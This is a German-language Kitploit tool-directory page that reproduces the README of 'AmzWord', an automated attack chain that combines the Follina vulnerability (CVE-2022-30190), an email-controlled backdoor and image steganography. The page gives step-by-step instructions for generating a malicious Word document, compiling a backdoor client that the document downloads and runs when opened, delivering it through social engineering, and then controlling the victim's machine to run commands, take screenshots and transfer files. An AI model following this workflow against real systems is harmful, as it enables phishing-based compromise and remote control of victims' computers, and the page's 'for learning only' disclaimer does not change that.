Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
AmzWord — Eine automatisierte Angriffskette basierend auf CVE-2022-30190, einer E-Mail-Backdoor und Bildsteganografie. | Kitploit
Tools/GitHubGitHub/jump-wang-111/amzword
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationSteganografieCommand and ControlSocial EngineeringLernen & BildungE-Mail-Sicherheit
GitHubjump-wang-111/amzword

AmzWord

Eine automatisierte Angriffskette basierend auf CVE-2022-30190, einer E-Mail-Backdoor und Bildsteganografie.

12vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

AmzWord

eine automatisierte Angriffskette basierend auf CVE-2022-30190, 163-E-Mail-Backdoor und Bild-Steganographie

Dank der folgenden GitHub-Repositories haben wir Teile des Codes referenziert und modifiziert, um unsere Arbeit zu integrieren und umzusetzen:

  • gdog
  • follina
  • virtual-reality

中文README请看这里

Voraussetzungen

gdog:

  • Python 2.7
  • PyCrypto-Modul
  • WMI-Modul
  • Enum34-Modul
  • Netifaces-Modul

follina:

  • Python 3.x

Nutzung & Angriffsablauf

  1. Verwenden Sie follina.py, um eine bösartige Word-Datei zu erstellen und die HTTP-Überwachung zu aktivieren

    • Sie können den Standardnamen und die Standard-IP im Code ändern
    • Sie können auch --ip und --output verwenden, um sie anzugeben
    • Detaillierte Verwendung finden Sie unter follina. Wir haben die Benutzeroberfläche nicht geändert.
    • z.B.: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. Ändern Sie client.py und gdog.py unter gdog und füllen Sie die folgenden Informationen aus

    root@kitploit:~
    gmail_user = 'your email'
    gmail_pwd = 'your pwd'
    server = "smtp server"
    imap_server = 'imap server'
    
  3. Kompilieren Sie client.py zu tar.exe und legen Sie es unter /follina/www ab

  4. Verwenden Sie eine beliebige Social-Engineering-Methode, um es an das Ziel zu senden. Sobald das Opfer Word öffnet, wird tar.exe automatisch heruntergeladen und ausgeführt.

  5. Der Angreifer führt gdog lokal aus und sendet Befehle, um den Zielrechner zu steuern. Zur Nutzung siehe gdog

Anmerkung

  1. Dies ist nur eine Demo der Implementierung der Angriffskette. Die ausgeführte exe kann sogar im Task-Manager gefunden werden, was die Beobachtung des Effekts erleichtert. Wir haben keine Anti-Virus-, Versteck- oder Privilegieneskalationsmaßnahmen durchgeführt. Diese sind unter Windows natürlich kein Problem, oder?
  2. Das gdog-Projekt existiert schon lange, und wir haben viel Arbeit investiert, um es erfolgreich zum Laufen zu bringen. Die bisher bestätigten Fernsteuerungsbefehle umfassen: Befehle ausführen, Screenshots machen, Pop-up-Fenster, Herunterfahren, Bildschirm sperren und Dateien übertragen. Diese Funktionen reichen für die meisten Anforderungen aus.
  3. Ich weiß nicht warum, aber es scheint ein Problem mit der SUBJECT-Suche von IMAP zu geben. Wir können keine E-Mails mit dem betreffenden Betreff finden, und der Rückgabewert ist leer. Wir müssen andere Methoden anwenden, z. B. alle ungelesenen E-Mails lesen, die Zielmails herausfiltern und die anderen dann wieder als ungelesen markieren. Dies kann bei vielen gesteuerten Benutzern zu Problemen führen und muss gelöst werden.
  4. Dieses Projekt dient nur zu Lern- und Austauschzwecken.
Tool herunterladen